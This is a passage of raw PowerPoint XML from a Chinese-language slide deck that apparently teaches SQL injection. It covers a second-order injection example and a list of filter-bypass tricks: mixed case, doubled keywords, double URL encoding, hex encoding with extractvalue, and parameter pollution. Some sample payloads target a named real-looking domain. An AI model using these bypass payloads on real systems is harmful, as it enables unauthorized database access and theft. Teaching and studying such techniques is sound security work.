                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二步：通过注册新用户，将语句注入数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行数据库插入数据时，对其中特殊字符进行了转义处理，在写入数据库时保留了原来的数据。</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第三步：二次构造语句，调用数据库中转义语句。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin’#’and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> password=‘$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>curr_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是注释符，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后面的语句会被注释掉 ，最终执行的语句是</a:t>
            </a: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username=‘admin’”</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263062" y="5286375"/>
            <a:ext cx="5857875" cy="3143250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600825" y="10181945"/>
            <a:ext cx="11182350" cy="34467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95400" y="2974417"/>
            <a:ext cx="22360079" cy="8379383"/>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7970520"/>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4. SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注入绕过汇总</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、大小写绕过</a:t>
            </a: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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、替换关键字</a:t>
            </a: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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、编码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>url,hex</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Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a: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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、注释符（普通注释，内联注释）</a:t>
            </a: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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、等价函数及命令</a:t>
            </a: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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、特殊符号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、参数污染（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>hpp</a:t>
            </a:r>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a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12776835" y="2910840"/>
            <a:ext cx="8972550" cy="8810625"/>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5.1</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822848" y="3689648"/>
            <a:ext cx="21530392" cy="5816977"/>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、大小写绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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大小写绕过用于只针对小写或大写的关键字匹配技术正则表达式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>匹配时大小写不敏感便无法绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://www.powerun.org.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dex.php?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>15 uNIoN sELecT 1,2,3,4  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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5.2</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958752" y="3833664"/>
            <a:ext cx="23042560" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、替换关键字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这些关键字如果只匹配一次就很容易绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cepo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/?id=1' anandd '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>替换关键字同样是很基础的技术也可以构造得更复杂SeLSeselectleCTecT关键要看正则表达式会进行几次匹配处理了</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5.3</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750840" y="4049689"/>
            <a:ext cx="22178464" cy="6863417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、编码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url,hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器会对特殊字符进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码如：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>空格%20、单引号%27、左括号%28、右括号%29</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>普通的URL编码可能无法实现绕过，不过存在一种情况，URL编码只进行了一次解码过滤可以用两次编码绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>page.php?id=1%252f%252aUNION%252f%252aSELECT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例：http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cepo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/?id=1' %25%36%31%25%36%65%25%36%34 '1'='1</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5.3.1</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894856" y="3689648"/>
            <a:ext cx="21530392" cy="3293209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、编码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url,hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.十六进制编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Powerun.org.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>index.php?page_id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=-15 u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ion se</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ect 1,2,3,4,SELECT(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x3C613E6365706F3C2F613E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,0x2f61))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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5.3.2</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303709" y="3617641"/>
            <a:ext cx="21833506" cy="5324535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
